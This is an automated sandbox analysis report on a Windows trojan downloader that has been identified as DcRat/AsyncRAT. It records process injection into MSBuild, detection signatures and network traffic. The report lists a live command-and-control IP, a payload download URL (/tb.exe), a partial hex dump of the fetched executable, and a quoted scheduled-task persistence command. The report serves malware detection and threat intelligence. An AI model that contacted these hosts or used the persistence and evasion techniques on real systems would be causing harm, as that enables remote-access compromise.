Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe

Overview

General Information

Sample name:SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe
Analysis ID:1663865
MD5:9308044d486d7b3f5ffee3f41d3f7881
SHA1:ee98fb3fb0b2f5e0a1e05fc409b920363626a8ca
SHA256:a4846d7540225062d89a5bb08fdc3ed947e0ca684507a5f21bfe7d71bbcc2dd3
Tags:exeuser-SecuriteInfoCom
Infos:

Detection

DcRat
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected DcRat
.NET source code contains potential unpacker
.NET source code contains very large strings
.NET source code references suspicious native API functions
AI detected suspicious PE digital signature
Allocates memory in foreign processes
Compiles code for process injection (via .Net compiler)
Contains functionality to capture screen (.Net source)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Sigma detected: Dot net compiler compiles file from suspicious location
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Suricata IDS alerts with low severity for network traffic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe (PID: 3928 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe" MD5: 9308044D486D7B3F5FFEE3F41D3F7881)
    • csc.exe (PID: 6996 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5dljncsi\5dljncsi.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
      • conhost.exe (PID: 2576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 7016 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8956.tmp" "c:\Users\user\AppData\Local\Temp\5dljncsi\CSC46F1B711EF3E491E90EFFC96C5EAD74.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
    • MSBuild.exe (PID: 5036 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapWindows_Trojan_DCRat_1aeea1acunknownunknown
  • 0x18a8d3:$a1: havecamera
  • 0x1907f9:$a2: timeout 3 > NUL
  • 0x191d43:$a3: START "" "
  • 0x198cc0:$b2: DcRat By qwqdanchun1

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2388462794.0000000002D96000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_DCRat_1aeea1acunknownunknown
  • 0xc384:$b2: DcRat By qwqdanchun1
00000000.00000002.1176486641.00000000032AB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000004.00000002.2388462794.000000000300F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DcRat_2Yara detected DcRatJoe Security
      00000004.00000002.2388462794.000000000300F000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_DCRat_1aeea1acunknownunknown
      • 0x3258:$b2: DcRat By qwqdanchun1
      • 0x8058:$b2: DcRat By qwqdanchun1
      • 0x8298:$b2: DcRat By qwqdanchun1
      00000004.00000002.2387305116.00000000010F8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_DCRat_1aeea1acunknownunknown
      • 0xc5c:$b2: DcRat By qwqdanchun1
      • 0x26b0:$b2: DcRat By qwqdanchun1
      Click to see the 12 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.32afe74.3.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.32afe74.3.raw.unpackrat_win_asyncratDetect AsyncRAT based on specific stringsSekoia.io
        • 0x1c392:$str02: get_SslClient
        • 0x1c3ae:$str03: get_TcpClient
        • 0x17a4d:$str04: get_SendSync
        • 0x19169:$str05: get_IsConnected
        • 0x1a252:$str06: set_UseShellExecute
        • 0x1e93e:$str08: Select * from AntivirusProduct
        • 0x1419a:$str09: Stub.exe
        • 0x1425e:$str09: Stub.exe
        • 0x1d08a:$str10: timeout 3 > NUL
        • 0x1e382:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn
        0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.32afe74.3.raw.unpackrat_win_dcrat_qwqdanchunFind DcRAT samples (qwqdanchun) based on specific stringsSekoia.io
        • 0x1e344:$str03: Po_ng
        • 0x1cb64:$str04: Pac_ket
        • 0x1e8b2:$str05: Perfor_mance
        • 0x1e8f6:$str06: Install_ed
        • 0x19169:$str07: get_IsConnected
        • 0x1a455:$str08: get_ActivatePo_ng
        • 0x1b71d:$str09: isVM_by_wim_temper
        • 0x1d08a:$str11: timeout 3 > NUL
        • 0x1e4c2:$str12: ProcessHacker.exe
        • 0x1e6b4:$str13: Select * from Win32_CacheMemory
        0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.32afe74.3.raw.unpackINDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDeviceDetects executables attemping to enumerate video devices using WMIditekSHen
        • 0x1e6b4:$q1: Select * from Win32_CacheMemory
        • 0x1e6f4:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
        • 0x1e742:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
        • 0x1e790:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
        0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.32ab9fc.2.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          Click to see the 27 entries

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Dynamic .NET Compilation Via Csc.EXE
          Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5dljncsi\5dljncsi.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5dljncsi\5dljncsi.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe, ParentProcessId: 3928, ParentProcessName: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5dljncsi\5dljncsi.cmdline", ProcessId: 6996, ProcessName: csc.exe
          Sigma detected: Dynamic CSharp Compile Artefact
          Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe, ProcessId: 3928, TargetFilename: C:\Users\user\AppData\Local\Temp\5dljncsi\5dljncsi.cmdline

          Data Obfuscation

          barindex
          Sigma detected: Dot net compiler compiles file from suspicious location
          Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5dljncsi\5dljncsi.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5dljncsi\5dljncsi.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe, ParentProcessId: 3928, ParentProcessName: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5dljncsi\5dljncsi.cmdline", ProcessId: 6996, ProcessName: csc.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-04-12T19:35:14.891255+020020197142Potentially Bad Traffic192.168.2.44971377.223.119.8580TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-04-12T19:35:20.984647+020028424781Malware Command and Control Activity Detected77.223.119.851414192.168.2.449714TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus detection for URL or domain
          Source: http://77.223.119.85/tb.exeAvira URL Cloud: Label: malware
          Antivirus detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\5dljncsi\5dljncsi.dllAvira: detection malicious, Label: TR/Dropper.Gen7
          Multi AV Scanner detection for submitted file
          Source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeVirustotal: Detection: 31%Perma Link
          Source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeReversingLabs: Detection: 36%
          Joe Sandbox ML detected suspicious sample
          Source: Submited SampleNeural Call Log Analysis: 99.7%
          Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.4:49724 version: TLS 1.2
          Source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: q costura.packetlib.pdb.compressed source: MSBuild.exe, 00000004.00000002.2388462794.0000000002D21000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: costura.costura.pdb.compressed source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe, 00000000.00000002.1176486641.00000000032AB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2388462794.0000000002D21000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: q7C:\Users\user\AppData\Local\Temp\5dljncsi\5dljncsi.pdbt source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe, 00000000.00000002.1176486641.00000000032E1000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: q7C:\Users\user\AppData\Local\Temp\5dljncsi\5dljncsi.pdb source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe, 00000000.00000002.1176486641.00000000032E1000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: packetlibAcostura.packetlib.dll.compressedAcostura.packetlib.pdb.compressed#system.appcontextQcostura.system.appcontext.dll.compressed;system.collections.concurrenticostura.system.collections.concurrent.dll.compressed%system.collectionsScostura.system.collections.dll.compressed;system.collections.nongenericicostura.system.collections.nongeneric.dll.compressed=system.collections.specializedkcostura.system.collections.specialized.dll.compressed+system.componentmodelYcostura.system.componentmodel.dll.compressedKsystem.componentmodel.eventbasedasyncycostura.system.componentmodel.eventbasedasync.dll.compressedAsystem.componentmodel.primitivesocostura.system.componentmodel.primitives.dll.compressedGsystem.componentmodel.typeconverterucostura.system.componentmodel.typeconverter.dll.compressed source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe, 00000000.00000002.1176486641.00000000032AB000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed5microsoft.win32.primitivesccostura.microsoft.win32.primitives.dll.compressed source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe, 00000000.00000002.1176486641.00000000032AB000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: costura.packetlib.pdb.compressed source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe, 00000000.00000002.1176486641.00000000032AB000.00000004.00000800.00020000.00000000.sdmp

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 77.223.119.85:1414 -> 192.168.2.4:49714
          Source: global trafficTCP traffic: 192.168.2.4:49714 -> 77.223.119.85:1414
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Tue, 08 Apr 2025 21:05:32 GMTAccept-Ranges: bytesETag: "3466e6f6c9a8db1:0"Server: Microsoft-IIS/10.0Date: Sat, 12 Apr 2025 17:35:14 GMTContent-Length: 1548800Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 47 05 da d5 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 30 00 00 98 17 00 00 08 00 00 00 00 00 00 6e b7 17 00 00 20 00 00 00 c0 17 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 18 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 14 b7 17 00 57 00 00 00 00 c0 17 00 aa 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 17 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 97 17 00 00 20 00 00 00 98 17 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 aa 05 00 00 00 c0 17 00 00 06 00 00 00 9a 17 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 17 00 00 02 00 00 00 a0 17 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 b7 17 00 00 00 00 00 48 00 00 00 02 00 05 00 88 97 16 00 8c 1f 01 00 01 00 00 00 d9 00 00 06 e0 7c 00 00 a6 1a 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 57 00 07 80 c2 18 00 48 33 c0 c3 00 00 00 00 b8 57 00 07 80 c3 00 00 33 c0 c2 14 00 00 00 00 1e 17 28 5d 01 00 06 2a 1e 02 28 17 00 00 0a 2a 32 02 7b 07 00 00 04 28 d0 00 00 06 2a da 73 18 00 00 0a 25 72 01 00 00 70 6f 1a 00 00 0a 72 2f 00 00 70 6f 1e 00 00 0a 25 72 2f 00 00 70 6f 1a 00 00 0a 02 6f 1e 00 00 0a 6f 1f 00 00 0a 28 d4 00 00 06 2a da 73 18 00 00 0a 25 72 01 00 00 70 6f 1a 00 00 0a 72 3b 00 00 70 6f 1e 00 00 0a 25 72 45 00 00 70 6f 1a 00 00 0a 02 6f 1e 00 00 0a 6f 1f 00 00 0a 28 d4 00 00 06 2a 56 28 23 00 00 0a 73 24 00 00 0a 20 20 02 00 00 6f 25 00 00 0a 2a 62 7e 02 00 00 04 2c 10 7e 02 00 00 04 6f 26 00 00 0a 14 80 02 00 00 04 2a 66 7e 04 00 00 04 28 20 00 00 0a 2c 0c 28 0a 00 00 06 2c 05 28 0d 00 00 06 2a 8e 0f 00 28 0f 00 00 06 0f 01 28 10 00 00 06 d0 02 00 00 1b 28 27 00 00 0a 28 28 00 00 0a a5 02 00 00 1b 2a 1a 7e 1f 00 00 04 2a 1e 02 80 1f 00 00 04 2a 1a 7e 20 00 00 04 2a 1e 02 80 20 00 00 04 2a 1a 7e 21 00 00 04 2a 1e 02 80 21 00 00 04
          Source: global trafficHTTP traffic detected: GET /tb.exe HTTP/1.1Host: 77.223.119.85Connection: Keep-Alive
          Source: Joe Sandbox ViewASN Name: EKAT-ASRU EKAT-ASRU
          Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
          Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49713 -> 77.223.119.85:80
          Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
          Source: unknownTCP traffic detected without corresponding DNS query: 77.223.119.85
          Source: unknownTCP traffic detected without corresponding DNS query: 77.223.119.85
          Source: unknownTCP traffic detected without corresponding DNS query: 77.223.119.85
          Source: unknownTCP traffic detected without corresponding DNS query: 77.223.119.85
          Source: unknownTCP traffic detected without corresponding DNS query: 77.223.119.85
          Source: unknownTCP traffic detected without corresponding DNS query: 77.223.119.85
          Source: unknownTCP traffic detected without corresponding DNS query: 77.223.119.85
          Source: unknownTCP traffic detected without corresponding DNS query: 77.223.119.85
          Source: unknownTCP traffic detected without corresponding DNS query: 77.223.119.85
          Source: unknownTCP traffic detected without corresponding DNS query: 77.223.119.85
          Source: unknownTCP traffic detected without corresponding DNS query: 77.223.119.85
          Source: unknownTCP traffic detected without corresponding DNS query: 77.223.119.85
          Source: unknownTCP traffic detected without corresponding DNS query: 77.223.119.85
          Source: unknownTCP traffic detected without corresponding DNS query: 77.223.119.85
          Source: unknownTCP traffic detected without corresponding DNS query: 77.223.119.85
          Source: unknownTCP traffic detected without corresponding DNS query: 77.223.119.85
          Source: unknownTCP traffic detected without corresponding DNS query: 77.223.119.85
          Source: unknownTCP traffic detected without corresponding DNS query: 77.223.119.85
          Source: unknownTCP traffic detected without corresponding DNS query: 77.223.119.85
          Source: unknownTCP traffic detected without corresponding DNS query: 77.223.119.85
          Source: unknownTCP traffic detected without corresponding DNS query: 77.223.119.85
          Source: unknownTCP traffic detected without corresponding DNS query: 77.223.119.85
          Source: unknownTCP traffic detected without corresponding DNS query: 77.223.119.85
          Source: unknownTCP traffic detected without corresponding DNS query: 77.223.119.85
          Source: unknownTCP traffic detected without corresponding DNS query: 77.223.119.85
          Source: unknownTCP traffic detected without corresponding DNS query: 77.223.119.85
          Source: unknownTCP traffic detected without corresponding DNS query: 77.223.119.85
          Source: unknownTCP traffic detected without corresponding DNS query: 77.223.119.85
          Source: unknownTCP traffic detected without corresponding DNS query: 77.223.119.85
          Source: unknownTCP traffic detected without corresponding DNS query: 77.223.119.85
          Source: unknownTCP traffic detected without corresponding DNS query: 77.223.119.85
          Source: unknownTCP traffic detected without corresponding DNS query: 77.223.119.85
          Source: unknownTCP traffic detected without corresponding DNS query: 77.223.119.85
          Source: unknownTCP traffic detected without corresponding DNS query: 77.223.119.85
          Source: unknownTCP traffic detected without corresponding DNS query: 77.223.119.85
          Source: unknownTCP traffic detected without corresponding DNS query: 77.223.119.85
          Source: unknownTCP traffic detected without corresponding DNS query: 77.223.119.85
          Source: unknownTCP traffic detected without corresponding DNS query: 77.223.119.85
          Source: unknownTCP traffic detected without corresponding DNS query: 77.223.119.85
          Source: unknownTCP traffic detected without corresponding DNS query: 77.223.119.85
          Source: unknownTCP traffic detected without corresponding DNS query: 77.223.119.85
          Source: unknownTCP traffic detected without corresponding DNS query: 77.223.119.85
          Source: unknownTCP traffic detected without corresponding DNS query: 77.223.119.85
          Source: unknownTCP traffic detected without corresponding DNS query: 77.223.119.85
          Source: unknownTCP traffic detected without corresponding DNS query: 77.223.119.85
          Source: unknownTCP traffic detected without corresponding DNS query: 77.223.119.85
          Source: unknownTCP traffic detected without corresponding DNS query: 77.223.119.85
          Source: unknownTCP traffic detected without corresponding DNS query: 77.223.119.85
          Source: unknownTCP traffic detected without corresponding DNS query: 77.223.119.85
          Source: global trafficHTTP traffic detected: GET /tb.exe HTTP/1.1Host: 77.223.119.85Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
          Source: global trafficHTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
          Source: global trafficDNS traffic detected: DNS query: c.pki.goog
          Source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe, 00000000.00000002.1176486641.00000000032A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.223.118F
          Source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe, 00000000.00000002.1176486641.000000000326F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe, 00000000.00000002.1176486641.0000000003231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.223.119.85
          Source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe, 00000000.00000002.1176486641.0000000003231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.223.119.85/tb.exe
          Source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
          Source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
          Source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
          Source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
          Source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
          Source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
          Source: MSBuild.exe, 00000004.00000002.2387305116.0000000001083000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2387305116.00000000010F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
          Source: MSBuild.exe, 00000004.00000002.2387305116.00000000010F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/:
          Source: MSBuild.exe, 00000004.00000002.2387305116.0000000001083000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
          Source: MSBuild.exe, 00000004.00000002.2393602638.0000000005401000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.4.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
          Source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeString found in binary or memory: http://ocsp.digicert.com0A
          Source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeString found in binary or memory: http://ocsp.digicert.com0C
          Source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeString found in binary or memory: http://ocsp.digicert.com0X
          Source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe, 00000000.00000002.1176486641.000000000326F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe, 00000000.00000002.1176486641.0000000003231000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2388462794.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2388462794.0000000002FC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
          Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.4:49724 version: TLS 1.2

          Key, Mouse, Clipboard, Microphone and Screen Capturing

          barindex
          Contains functionality to capture screen (.Net source)
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.44195d0.4.raw.unpack, Packet.cs.Net Code: GetScreen

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.32afe74.3.raw.unpack, type: UNPACKEDPEMatched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.32afe74.3.raw.unpack, type: UNPACKEDPEMatched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.32afe74.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.32ab9fc.2.raw.unpack, type: UNPACKEDPEMatched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.32ab9fc.2.raw.unpack, type: UNPACKEDPEMatched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.32ab9fc.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.44195d0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.44195d0.4.raw.unpack, type: UNPACKEDPEMatched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
